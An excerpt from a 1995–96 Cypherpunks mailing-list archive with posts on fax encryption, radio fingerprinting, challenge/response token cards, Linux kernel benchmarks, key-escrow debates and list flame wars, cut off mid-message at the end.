-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMORJaPgyLN8bw6ZVAQG+WQP/X4j2qn9tnhDoJKdqctxBCoQzH4F//kKc
zsau7Cxs49XGHAaoZo2Pk2svU79FWG7HyWsm0VAPR9ezHiWf8W/Tyi1NgxCkNwjo
62HFNsE0U6Rfo0Itd26WuICe9aC2SG5J6tX8+MzJZqHzzx2xhBUNPKFqt/ZwVtFZ
KNLAGkM/7Hg=
=jc3o
-----END PGP SIGNATURE-----

--------------------------------------------------
The e$ lists are brought to you by:

Making Commerce Convenient (tm) - Oki Advanced Products - Marlboro, MA
Value-Checker(tm) smart card reader= http://www.oki.com/products/vc.html

Where people, networks and money come together: Consult Hyperion
http://www.hyperion.co.uk                    info@hyperion.co.uk

See your name here! Be a charter sponsor for e$pam, e$, and Ne$ws!
e-mail rah@shipwright.com for details...
-------------------------------------------------

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Mon, 1 Jan 1996 09:23:16 +0800
To: cypherpunks@toad.com
Subject: Re: Is this as insecure... (really "Fax crypto")
Message-ID: <199601010018.QAA01779@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain



Shamir did a talk on fax crypto in May, 1994.  There is no reason that this
can't be completely secure, the overlays could be one-time pads.   Bill
Sommerfeld posted a description of the technique to the list after he went
to a presentation on the technique, I'll forward it to anybody that needs
a copy.

Using the same overlay multiple times, though, would make it completely
insecure.  I can't believe that they are recommending that that could
be a possibility.

thad
-- Thaddeus Beier                     thad@hammerhead.com
   Technology Development                   408) 286-3376
   Hammerhead Productions        http://www.got.net/~thad 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andr0id@midwest.net (Jason Rentz)
Date: Mon, 1 Jan 1996 07:50:56 +0800
To: cypherpunks@toad.com
Subject: Re: Fwd: Re: Fwd: Re: FH radios [Dave Emery] [Vaughan Pratt]
Message-ID: <199512312305.RAA21699@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain



>think I underestimated how hard things could get.  If you're just
>trying to track a frequency-hopping signal where the rest of the power
>in the band is some mix of Gaussian noise and non-hopping signals, the
>carrier should be clearly visible as a spike hopping around in the
>band.  As soon as you have two or more frequency-hopping signals
>however, keeping track of which carrier is which as they hop around
>looks *much* harder.  If they hop at discernibly different times then
>you can correlate a carrier that disappeared with the one that appeared
>elsewhere at the same time.  This easily described and implemented
>approach breaks down when two or more signals hop at the same time.
>Here you might try to associate some sort of signature with each signal
>to allow you to pair up the new carriers with the old, but you'd have
>to know more about the situation to say what signatures would be good.
>
RF finger-printing would do the trick.  Any and all RF equipment has its own
RF fingerprint no matter how closely they are made at the factory.  Now
having equipment to RF fingerprint and identify that fingerprint fast enough
is another story!  

                        Dr0id

(andr0id@midwest.net  callsign: N9XLM)
( Computer Consulting & Management   )
(P.O. Box 421  Cambria, IL 62915-0421)

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQENAzCsIi4AAAEH/1hb5+tO/n99Nbppf0ImLJ6AaVZ3NlZP0ZHwRQor00uA129i
d4zWixNXxc8t2auaqN+asV99LpIip3/nQzBnjydiumeBdGLF2PR9+6X8X/RrqKa1
dVIukxM5Agg2eM6ih+0J38hgKJ3qzKXSz6sjYmpaxvbXZoHHOLUk/ZtHUKvvEyPw
hnJEYnut8NUnIeK56lqeqRw86yoeRKymbfCdjdpgeY2aRwK2FJts8sbb7Fs10s4y
jgxWIxIipBznbGUTh1hb2XrLGPENwk3E/qqXQJEsrySbtwdl6VgTVQjhDDEJMitL
DYeiQ3W5EgxfcdbM1j2FwYu3P/dM6Y0I8xLMYT0ABRG0NmFuZHIwaWRAb2ljdTgx
Mi5jb20gKG9pY3U4MTIuY29tIHN5c3RlbSBhZG1pbmlzdHJhdG9yKYkBFQMFEDCs
LO90C7R/GkJcSQEB01cH/0KC3sd+u4OxMku5378SJktoN6QIQYLJ7uVbuV4S51yK
NAotCGf4Wl6wwjynzZvXKU0H87oDuMiq7FybgMNL2n+4bQIZi0iz0lIuzwoMDu63
NrHUW9Kz42pOnhrEhrdkHhHL9O5GgD1yc40fJ3qw5h7LQEjDxgypyw0IFILFc34u
LeRLliNibxKp8JwAxXNHWSgxu28TQvmnkHi0AHP6tJ/uZYe+4dqJtrMMsYFjzZaz
DPmxD+dzbTwlQKtJaP1ZkDI0Sr072wrZDv+G86GyGBMX2lpSafpRitnxuUttjU9o
wsQ9Qo5xiH1nZRCs/bDzJe/gng+GHzevixDIITurtNA=
=SgPT
-----END PGP PUBLIC KEY BLOCK-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 1 Jan 1996 07:32:05 +0800
To: cypherpunks@toad.com
Subject: Re: Can We Cut the Crap?
In-Reply-To: <ad0c14fb020210041a1c@[205.199.118.202]>
Message-ID: <NoVZgD6w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:
> There is no point in the back-and-forth of insults, "Dr. Fred is a loon,"
> "Alice is Detweiler," and other such nonsense. If you don't want to read
> the comments of Fred Cohen, Dimitri Vulis, Alice whatever,
> Vlad/Lance/Larry/Pablo, then just don't read them! Filter them out, delete
> them immediately, read them briefly, whatever.

Or Chris Shalutis, or Ed Carp, or Perry Metzger...

Too bad majordomo@toad.com can't be instructed not to send contributions from
certain folks to certain other folks.  I guess I'll have to figure out how
to use procmail with this thing after all.

Happy New Year,

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Mon, 1 Jan 1996 11:42:33 +0800
To: nobody@tjava.com
Subject: Re: US calls for measures against Internet porn
In-Reply-To: <199601010034.SAA07422@tjava.com>
Message-ID: <czz5w8m9LYvL085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199601010034.SAA07422@tjava.com>,
nobody@tjava.com (Anonymous) wrote:

> Apologies if you've seen this before:
> 
>          WASHINGTON DC (Reuter) - The US called Sunday for improved
> management of the Internet to prevent people seeing pornographic
> material on the world computer network.
>          A joint statement from the Clinton administration's State
> Council (Cabinet) and the office of the Republican Party's Planning
> Committee said there were increasing links between domestic computer
> systems and the Internet.
>          ``Good use of the Internet is of great importance to increase
> global information exchanges, promote economic construction and
> develop science,'' the Associated Press quoted the statement as
> saying.
>          But because of weak management and lack of control over what
> enters the Internet, some pornographic and other harmful materials
> have come onto the system, it said. ``We must take effective measures
> to deal with this,'' it said.
>          German prosecutors said Friday they had launched an
> investigation into the U.S.-based online service CompuServe Inc on
> suspicion that members had sent child pornography over its worldwide
> computer network.
>          The inquiry prompted the service to block access to 200
> sexually-explicit Internet discussion groups and sites where
> pornographic pictures are available.
>          An explosion in use and ownership of modems in the US is
> giving an increasingly large number of people access to the Internet.
> 
> [The amazing thing is how _little_ editing was necessary.]
> 

Ummm.  Wasn't it *China* in today's original?

- -- 
   Alan Bostick             | SWINDON:   What will history say?
Seeking opportunity to      | BURGOYNE:  History, sir, will tell lies as usual.
develop multimedia content. |    George Bernard Shaw, THE DEVIL'S DISCIPLE
Finger abostick@netcom.com for more info and PGP public key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMOc9A+VevBgtmhnpAQFjOAL/d4U3rPqsYG6Bkzv1JWX8uoePdYCxZTGf
/AnOLH1vSw2ZEJ3oNDTiLxjM4uuoWHjAOzJRer7aAb1UuoCT1wm3+aEQNSk83Jg6
jMRFZtri5nj2LKTD2u6T19wqydYZ6zBl
=aYBC
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@tjava.com (Anonymous)
Date: Mon, 1 Jan 1996 08:26:11 +0800
To: cypherpunks@toad.com
Subject: US calls for measures against Internet porn
Message-ID: <199601010034.SAA07422@tjava.com>
MIME-Version: 1.0
Content-Type: text/plain


Apologies if you've seen this before:

         WASHINGTON DC (Reuter) - The US called Sunday for improved
management of the Internet to prevent people seeing pornographic
material on the world computer network.
         A joint statement from the Clinton administration's State
Council (Cabinet) and the office of the Republican Party's Planning
Committee said there were increasing links between domestic computer
systems and the Internet.
         ``Good use of the Internet is of great importance to increase
global information exchanges, promote economic construction and
develop science,'' the Associated Press quoted the statement as
saying.
         But because of weak management and lack of control over what
enters the Internet, some pornographic and other harmful materials
have come onto the system, it said. ``We must take effective measures
to deal with this,'' it said.
         German prosecutors said Friday they had launched an
investigation into the U.S.-based online service CompuServe Inc on
suspicion that members had sent child pornography over its worldwide
computer network.
         The inquiry prompted the service to block access to 200
sexually-explicit Internet discussion groups and sites where
pornographic pictures are available.
         An explosion in use and ownership of modems in the US is
giving an increasingly large number of people access to the Internet.

[The amazing thing is how _little_ editing was necessary.]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Sun, 31 Dec 1995 16:44:18 +0800
To: puke@suburbia.net
Subject: (fwd) Benchmarks - revs 1.3.50 & 51
Message-ID: <199512310736.SAA06119@suburbia.net>
MIME-Version: 1.0
Content-Type: text/plain


Path: news.apana.org.au!goliath.apana.org.au!sysx.apana.org.au!sleeper.apana.org.au!greathan.apana.org.au!news-mail-gateway
From: fluido@marktest.pt (Carlo Emilio Prelz)
Newsgroups: apana.lists.os.linux.kernel
Subject: Benchmarks - revs 1.3.50 & 51
Date: Thu, 28 Dec 1995 08:05:17 +0100 (MET)
Organization: Mail-to-News Gateway
Lines: 158
Sender: daemon@greathan.apana.org.au
Approved: usenet@greathan.apana.org.au
Distribution: apana
Message-ID: <Pine.LNX.3.91.951228075225.11217A-100000@pimpinel.fluido.org>
NNTP-Posting-Host: greathan.apana.org.au

Hi. Here follow the benchmark comparisons w.r.t. revisions 50 & 51. I
decided to wait before posting rev 50 before because the file read &
write results again bounced up with it, and I spent some (very little)
time trying to see if I could have done anything to cause that. With
no results, as usual. Now I also have results for the "greased
weasel", and I decided to send out my numbers for what they're
worth. Not much has changed with the latest release...

I repeat my query: if anybody has suggestions about these huge jumps in 
disk performance, please let me know. I am ALWAYS running the benchmark 
test after a reboot. I login as root, start the process in background and 
log out, and then generally go to sleep. The machine is NOT online, and 
is not doing anything important at night. I have not changed anything in 
the kernel config in the latest 3 revisions. I have a plain old ISA
disk controller, and two generally fullish disks, but again, the
situation did not change notably between 1.3.49 and 1.3.50.

And, I now have to admit that I find it faster, for example, to load a 
huge C file into emacs, and have it do the syntax coloring. I noticed it 
this morning. 

No problems in patching & compiling.

--8<----8<----8<----8<----8<----8<----8<----8<----8<----8<----8<----8<----8<--

From:
* Linux pimpinel.fluido.org 1.3.49 #77 Fri Dec 22 21:05:57 MET 1995 i486
* Fri Dec 22 21:41:03 MET 1995

To:
* Linux pimpinel.fluido.org 1.3.50 #78 Mon Dec 25 11:18:00 MET 1995 i486
* Mon Dec 25 12:11:11 MET 1995

*******
Results
*******

File Write (30 seconds)                ||   1000.0 ->   9460.0  +846.00%
File Write (10 seconds)                ||   1200.0 ->   8070.0  +572.50%
File Copy  (30 seconds)                ||    968.0 ->   2636.0  +172.31%
File Copy  (10 seconds)                ||   1024.0 ->   2645.0  +158.30%
Execl Throughput Test                  ||     67.9 ->     85.3   +25.63%
C Compiler Test                        ||     48.7 ->     51.9    +6.57%
Pipe-based Context Switching Test      ||   9863.0 ->  10493.0    +6.39%
Process Creation Test                  ||    347.7 ->    368.9    +6.10%
Shell scripts (1 concurrent)           ||     96.4 ->    101.9    +5.71%
Shell scripts (4 concurrent)           ||     25.5 ->     26.5    +3.92%
Shell scripts (2 concurrent)           ||     50.8 ->     52.6    +3.54%
System Call Overhead Test              ||  29945.4 ->  30523.5    +1.93%
Dhrystone 2 using register variables   ||  49658.9 ->  49910.8    +0.51%
Arithmetic Test (type = int)           ||   8365.0 ->   8377.5    +0.15%
Arithmetic Test (type = double)        ||   5063.6 ->   5071.1    +0.15%
Recursion Test--Tower of Hanoi         ||    726.1 ->    727.1    +0.14%
Arithmetic Test (type = arithoh)       || 127103.2 -> 127265.6    +0.13%
Arithmetic Test (type = short)         ||   7508.8 ->   7515.5    +0.09%
Arithmetic Test (type = register)      ||   8367.3 ->   8372.8    +0.07%
Arithmetic Test (type = float)         ||   5066.8 ->   5069.3    +0.05%
Arithmetic Test (type = long)          ||   8371.8 ->   8372.1    +0.00%
Shell scripts (8 concurrent)           ||     13.0 ->     13.0    +0.00%
Pipe Throughput Test                   ||  17850.0 ->  17726.9    -0.69%
Dhrystone 2 without register variables ||  51001.9 ->  49772.1    -2.41%
File Read  (30 seconds)                ||   4613.0 ->   4404.0    -4.53%
File Read  (10 seconds)                ||   4648.0 ->   4390.0    -5.55%
Dc: sqrt(2) to 99 decimal places       ||  11886.7 ->  10822.2    -8.96%

--8<----8<----8<----8<----8<----8<----8<----8<----8<----8<----8<----8<----8<--

From:
* Linux pimpinel.fluido.org 1.3.50 #78 Mon Dec 25 11:18:00 MET 1995 i486
* Mon Dec 25 12:11:11 MET 1995

To:
* Linux pimpinel.fluido.org 1.3.51 #79 Wed Dec 27 19:16:06 MET 1995 i486
* Wed Dec 27 22:41:23 MET 1995

*******
Results
*******

File Read  (30 seconds)                ||   4404.0 ->   4548.0    +3.27%
File Read  (10 seconds)                ||   4390.0 ->   4516.0    +2.87%
Dc: sqrt(2) to 99 decimal places       ||  10822.2 ->  11034.2    +1.96%
Process Creation Test                  ||    368.9 ->    375.0    +1.65%
File Copy  (10 seconds)                ||   2645.0 ->   2683.0    +1.44%
File Copy  (30 seconds)                ||   2636.0 ->   2669.0    +1.25%
Shell scripts (4 concurrent)           ||     26.5 ->     26.8    +1.13%
C Compiler Test                        ||     51.9 ->     52.4    +0.96%
Dhrystone 2 without register variables ||  49772.1 ->  49808.7    +0.07%
Arithmetic Test (type = long)          ||   8372.1 ->   8376.6    +0.05%
Arithmetic Test (type = register)      ||   8372.8 ->   8376.1    +0.04%
Arithmetic Test (type = float)         ||   5069.3 ->   5069.9    +0.01%
Arithmetic Test (type = short)         ||   7515.5 ->   7515.7    +0.00%
Shell scripts (8 concurrent)           ||     13.0 ->     13.0    +0.00%
Arithmetic Test (type = double)        ||   5071.1 ->   5067.4    -0.07%
Arithmetic Test (type = arithoh)       || 127265.6 -> 127172.0    -0.07%
Dhrystone 2 using register variables   ||  49910.8 ->  49870.6    -0.08%
Arithmetic Test (type = int)           ||   8377.5 ->   8370.4    -0.08%
Recursion Test--Tower of Hanoi         ||    727.1 ->    724.3    -0.39%
Shell scripts (2 concurrent)           ||     52.6 ->     52.3    -0.57%
Shell scripts (1 concurrent)           ||    101.9 ->    101.2    -0.69%
File Write (30 seconds)                ||   9460.0 ->   9356.0    -1.10%
Pipe Throughput Test                   ||  17726.9 ->  17227.1    -2.82%
Pipe-based Context Switching Test      ||  10493.0 ->  10194.8    -2.84%
System Call Overhead Test              ||  30523.5 ->  29476.8    -3.43%
Execl Throughput Test                  ||     85.3 ->     81.5    -4.45%
File Write (10 seconds)                ||   8070.0 ->   7680.0    -4.83%

--8<----8<----8<----8<----8<----8<----8<----8<----8<----8<----8<----8<----8<--

From:
* Linux pimpinel.fluido.org 1.2.10 #59 Tue Jun 13 09:46:17 MET DST 1995 i486
* Tue Jun 27 10:18:13 MET DST 1995

To:
* Linux pimpinel.fluido.org 1.3.51 #79 Wed Dec 27 19:16:06 MET 1995 i486
* Wed Dec 27 22:41:23 MET 1995

*******
Results
*******

Process Creation Test                  ||    119.9 ->    375.0  +212.76%
Pipe-based Context Switching Test      ||   3446.9 ->  10194.8  +195.77%
Dc: sqrt(2) to 99 decimal places       ||   5906.2 ->  11034.2   +86.82%
Execl Throughput Test                  ||     51.6 ->     81.5   +57.95%
Shell scripts (8 concurrent)           ||     10.0 ->     13.0   +30.00%
Shell scripts (1 concurrent)           ||     78.3 ->    101.2   +29.25%
Shell scripts (4 concurrent)           ||     21.0 ->     26.8   +27.62%
Shell scripts (2 concurrent)           ||     41.0 ->     52.3   +27.56%
C Compiler Test                        ||     42.2 ->     52.4   +24.17%
Dhrystone 2 without register variables ||  46284.2 ->  49808.7    +7.61%
File Write (30 seconds)                ||   8911.0 ->   9356.0    +4.99%
Recursion Test--Tower of Hanoi         ||    709.2 ->    724.3    +2.13%
System Call Overhead Test              ||  29238.2 ->  29476.8    +0.82%
Arithmetic Test (type = float)         ||   5055.6 ->   5069.9    +0.28%
Arithmetic Test (type = long)          ||   8353.5 ->   8376.6    +0.28%
Arithmetic Test (type = register)      ||   8353.2 ->   8376.1    +0.27%
Arithmetic Test (type = short)         ||   7496.0 ->   7515.7    +0.26%
Arithmetic Test (type = double)        ||   5056.8 ->   5067.4    +0.21%
Arithmetic Test (type = int)           ||   8353.4 ->   8370.4    +0.20%
Arithmetic Test (type = arithoh)       || 126914.4 -> 127172.0    +0.20%
Dhrystone 2 using register variables   ||  49802.4 ->  49870.6    +0.14%
File Write (10 seconds)                ||   8100.0 ->   7680.0    -5.19%
Pipe Throughput Test                   ||  18512.0 ->  17227.1    -6.94%


--8<----8<----8<----8<----8<----8<----8<----8<----8<----8<----8<----8<----8<--

Enjoy!
Carlo

--
  *                                          ...Ma appena fuori tutto e' gomma,
* K * Carlo E. Prelz - fluido@marktest.pt     tutto e' cicca impiastricciata...
  *                                     (Marco Zappa-Niente cicca nella scuola)




--
+----------------------------------+-----------------------------------------+
|Julian Assange                    | "if you think the United  States has    |
|FAX: +61-3-9819-9066              |  has stood still, who built the largest |
|EMAIL: proff@suburbia.net         |  shopping centre in the world?" - Nixon |
+----------------------------------+-----------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Sun, 31 Dec 1995 17:44:15 +0800
To: lmccarth@cs.umass.edu
Subject: Re: (fwd) Benchmarks - revs 1.3.50 & 51
In-Reply-To: <199512310841.DAA09404@thor.cs.umass.edu>
Message-ID: <199512310846.TAA07013@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> 
> And the cypherpunk relevance is....<drum roll>...?
> 
>[...] linux kernel stats

Absolutely zero. Your's truely pressed the wrong key.

--Proff

+----------------------------------+-----------------------------------------+
|Julian Assange                    | "if you think the United  States has    |
|FAX: +61-3-9819-9066              |  has stood still, who built the largest |
|EMAIL: proff@suburbia.net         |  shopping centre in the world?" - Nixon |
+----------------------------------+-----------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 1 Jan 1996 10:19:20 +0800
To: vin@shore.net
Subject: Re: Australian "calculatorcard"
Message-ID: <01HZGYUZMNJ88Y5682@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: vin@shore.net (Vin McLellan)

>        Could be one of seven or 8 vendors of so-called
"challenge/response" tokens or calculators.  Most of those sold in the US
and Australia use straight DES (and a token-specific key) to encrypt the
"random" challenge number in the token -- but it could be any secret-key
algorithm.
-----------

	This is actually something cryptographic which I know a bit about,
so I'll tell you what I know. I had a suitemate a bit back who was working
for a local high-tech company as a computer programmer. He used a system
somewhat like this, but with some interesting permutations.
	The main difference was that it didn't use one algorithm. It used quite
a few, determined by a hashing of the challenge code. There were a considerable
number of challenge codes with distinct hash results that were never used. If
the card got too many of those (or too many wrong PINs), it switched to an
entirely different set of hashings and encryptions, all of which would warn the
server (thanks to their turning out something different in a hash function on
the server) that the card had been compromised. I suspect it would also wipe a
EEPROM that was storing the valid hash function and algorithms, but he wasn't
sure about that. It was all sealed in a plastic block to make sure it was
physically hard to reverse-engineer, anyway.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Mon, 1 Jan 1996 06:06:49 +0800
To: Mike Johnson <cypherpunks@toad.com>
Subject: SHATEST (was: Re: DOS - MD5 - Thanks)
Message-ID: <199512312155.QAA03270@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 29 Dec 1995 15:22:46 -0700 (MST), you wrote:

I've got a little goodie called SHATEST which I'm going to include
with the next release of the NOISE.SYS driver.. it's the Secure Hash
equivalent of MD5SUM...

(Originally written to test the optimized SHA code-- much thanks to
Colin Plumb, BTW--- for the /dev/random driver...)

--Rob

>A freestanding implementation of MD5SUM (compiled from that in the PGP 
>distribution) for DOS is at
>ftp://ftp.csn.net/mpj/public/md5sum.zip and on the Colorado Catacombs BBS 
>at 303-772-1062.

>I suggested to Phil Zimmermann that he should put this in the next PGP 
>release along with the compiled DOS version of PGP, but there hasn't been 
>a new release of PGP since then.

>Happy New Year!

Ditto...

>Mike Johnson
>mpj@exabyte.com

>#include <std_disclaimer.h>







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Mon, 1 Jan 1996 12:55:05 +0800
To: groundfog@alpha.c2.org
Subject: Re: For the New Year: A Symbol for Information Freedom
In-Reply-To: <199601010311.WAA12624@mail.FOUR.net>
Message-ID: <Pine.SV4.3.91.951231232901.9522E-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


I don't agree that the market is different than the people.

And I hope that Information Freedom doesn't become as trivialized, 
trendy, and the property of dilletantes as the red-ribbon AIDS shtick.

There is a danger to holding up the AIDS hullabaloo as a role model. To
wit, the AIDS activists have committed themselves to a lie - that AIDS is
an epidemic, a generalized threat to society. They are riding a tiger by
the tail, for when the actual facts seep into the consciousness of the
unwashed masses - which might never really happen, given the reality of
our "whoever puts out their press release first, gets awarded the
Conventional Wisdom seal-of-approval" journalism - then the
AIDS-industrial complex is going to be in trouble. 

So, on with the paperclips - only, let's make sure that no Hollywood
celebrities are allowed to participate. It's the kiss of death.... 

Alan Horowitz
alanh@infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an201465@anon.penet.fi (Scryptor)
Date: Mon, 1 Jan 1996 08:36:36 +0800
To: cypherpunks@toad.com
Subject: throwaway
Message-ID: <9512312345.AA13971@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



[from: WEIRDNUZ.410 (News of the Weird, Dec 15, 1995 by Chuck Shepherd)]

LEAD STORY

* A 62-year-old woman pleaded guilty in Roanoke, Va., in November to
stealing about 500 pieces of mail from her neighbors' mailboxes--her third
such offense in five years. She had been found sane and competent for trial
but nonetheless diagnosed as having an "irresistible impulse" to steal
other people's mail. The judge had kept her confined to her home since her
arrest, allowing her full freedom only on Sundays, when there is no mail
delivery. [Roanoke Times, 11-21-95]


--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: avatar@mindspring.com
Date: Thu, 21 Dec 95 05:13:46 PST
To: cypherpunks@toad.com
Subject: cyphernomicon
Message-ID: <199512211313.IAA11974@borg.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


If anyone is interested I would be willing to e-mail a copy of the
cyphernomicon to you.
BEWARE that it is 1.3MB in file size and 414 pages in text.
Charles Donald Smith Jr.
582 Clifton Rd. N.E.
Atlanta, Ga. 30307-1787
(404)-378-7282





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 21 Dec 95 01:03:57 PST
To: Hal <hfinney@shell.portal.com>
Subject: Re: King Kong Does e$
In-Reply-To: <199512201719.JAA12291@jobe.shell.portal.com>
Message-ID: <30D92197.7C87@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal wrote:
> But this influence is making us a target of companies who know that
> gaining our approval, or at least avoiding our criticism, is important
> for success on the net.  In many cases, such as the recent flap over
> Netscape's attitudes towards key escrow, I detect a whiff of two
> sidedness, in which one attitude is presented for the benefit of
> government and law enforcement interests, while another posture, more
> acceptable to cypherpunks, is adopted on the net.

  At the NIST meeting our representative made a strong statement
against the governments GAK proposal, and government interference
with crypto in general.  If I'm not mistaken that was a government
and law enforcement forum.  We want to sell (and give away) products
that contain strong encryption, and our customers want to buy it.
We are beginning to take a more active role in trying to achieve
this goal.  Its not happening fast enough for me either, but it
is happening.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@darkwing.uoregon.edu>
Date: Thu, 21 Dec 95 01:03:10 PST
To: cypherpunks@toad.com
Subject: Re: The Problem With Blaze And Weinstein
Message-ID: <199512210902.BAA03598@darkwing.uoregon.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 01:12 AM 12/21/95 GMT, "Bill Gates" wrote:

[...]

>Evidently the cypherpunks are all too impressed
>with Blaze and Weinstein's master degrees to see
>what's really happening.  Only true visionaries
>like myself and Dr. Frederic B Cohen are telling
>it like it is; everyone else has had the wool
>pulled over their eyes by the NSA/ATT/Netscape axis.
>
>It's amazing how clear everything becomes once
>one stops taking the medication that THEY prescribed.
>
>s/ Bill Gates

Oh, I see. I think you misspelled "troll". Hope this helps.
--
"The anchored mind screwed into me by the psycho-  | Greg Broiles
lubricious thrust of heaven is the one that thinks | gbroiles@netbox.com
every temptation, every desire, every inhibition." | 
	-- Antonin Artaud		   	   | 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 21 Dec 95 01:54:28 PST
To: ECafe Anonymous Remailer <cpunk@remail.ecafe.org>
Subject: Re: The Problem With Blaze And Weinstein
In-Reply-To: <199512202018.UAA02824@pangaea.ang.ecafe.org>
Message-ID: <30D92D80.1CED@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


ECafe Anonymous Remailer wrote:
> 
> I'm not trying to start a flame war. I'm
> sure these people are very smart and have
> written lots of good code. I'm sure they're
> very nice and never kick their dogs.  I'm
> just tired of people defending them as
> cypherpunks.
> 
> They aren't cypherpunks.
> 
> Neither has come out against GAK. They
> both carefully avoid commiting to any
> statement. They want us to think they're
> "one of us" but they don't want to be
> pinned down because they are double dipping
> on both sides of the fence.

> Weinstein is actively promoting GAK by
> working at the company that the government
> has chosen to bring it to you now that
> att has failed.

  I am against GAK.  I have been contributing to EFF for
years.  I have written and faxed my representatives in congress
stating my position against both GAK and government censorship
of the net.  The reason I'm working on security code at netscape
is that I think it may be the only way to foil the government's
plans to remove all privacy from its citizens is mass market
strong encryption software.

  Why do you believe that Netscape has been chosen by the
government to bring GAK to the masses?  Because of the
uninformed and misguided comments of Jim Clark?  Jim has been
educated and the company has taken a firm position against
government control of crypto.  When you go to the store today
and buy netscape you get strong encryption out of the box,
without any GAK.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert Heffren" <RDHeffren@gnn.com>
Date: Thu, 21 Dec 95 04:00:32 PST
To: sameer@c2.org>
Subject: Re: COMMUNITY CONNEXION PIONEERS PRIVATE ELECTRONIC COMMERCE
Message-ID: <199512211159.GAA01454@mail-e1a.gnn.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 19 Dec 95, sameer <sameer@c2.org> wrote;

> COMMUNITY CONNEXION PIONEERS PRIVATE ELECTRONIC COMMERCE
> Community ConneXion today announced a new service for its customers
> which will make secure, private electronic commerce more accessible
> to all merchants, from the small single-person business to large
> corporations trying to sell goods and services over the
> world-wide-web.

There went the neighborhood. The Prez and the Coalition on one side
and big biz on the other. AOL and their stings, all the motherfuckers
spamming the piss out of everybody else and every place you turn, some
swinging dick wants to put his goddamn hand in your pocket.

Fuck it! Shut this sonfabitch down and take up doll-collecting.

Who NEEDS this bullshit!

Unsub this bastard AND gone;


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMNlMrBMzypiVqpjNAQG/fAL9GS5NiWR/5mb+KbKwxp2wSB6MUliwJaEV
uBb+a7F5s7PQ0lQEWfujPKIoaF/iCB0zRKN0yLWCuvNiQe3YWMnwn5WggPekDRPl
0b3u37WHmeCKyhamMixnyK4w7jjT2use
=WaxG
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Thu, 21 Dec 95 05:10:05 PST
To: cypherpunks@toad.com
Subject: Microsoft Flame[tm] [NOISE]
Message-ID: <951221.063231.9N5.rnr.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

There's a lot of finger waving going on over Microsoft's alleged
predatory practices.  I just want to remind the pro-MS folks of
something.  Microsoft has a documented track record of using
